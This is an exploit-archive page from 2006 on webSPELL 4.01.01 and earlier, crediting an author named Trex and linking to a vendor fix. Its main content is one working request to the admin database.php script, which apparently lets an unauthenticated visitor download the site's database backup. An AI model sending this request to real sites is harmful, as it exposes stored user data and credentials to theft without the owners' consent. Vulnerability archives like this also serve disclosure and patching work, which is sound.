webSPELL <= 4.01.01 Database Backup Download Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : webSPELL <= 4.01.01 Database Backup Download Vulnerability
# Published : 2006-09-12
# Author : Trex
# Previous Title : Popper <= v1.41-r2 (form) Remote File Include Vulnerability
# Next Title : Vitrax Pre-modded <= 1.0.6-r3 Remote File Include Vulnerability

# WebSPELL <= 4.01.01 Accessible Database Backup Download Exploit
# Discovered by: Trex
# Visit: www.SecuritySector.org / www.UnderGround.ag

# Exploit:
http://[SITE]/[PATH]/admin/database.php?action=write&userID=1

# Solution:
http://cms.webspell.org/index.php?site=files&file=15

# www.Syue.com [2006-09-12]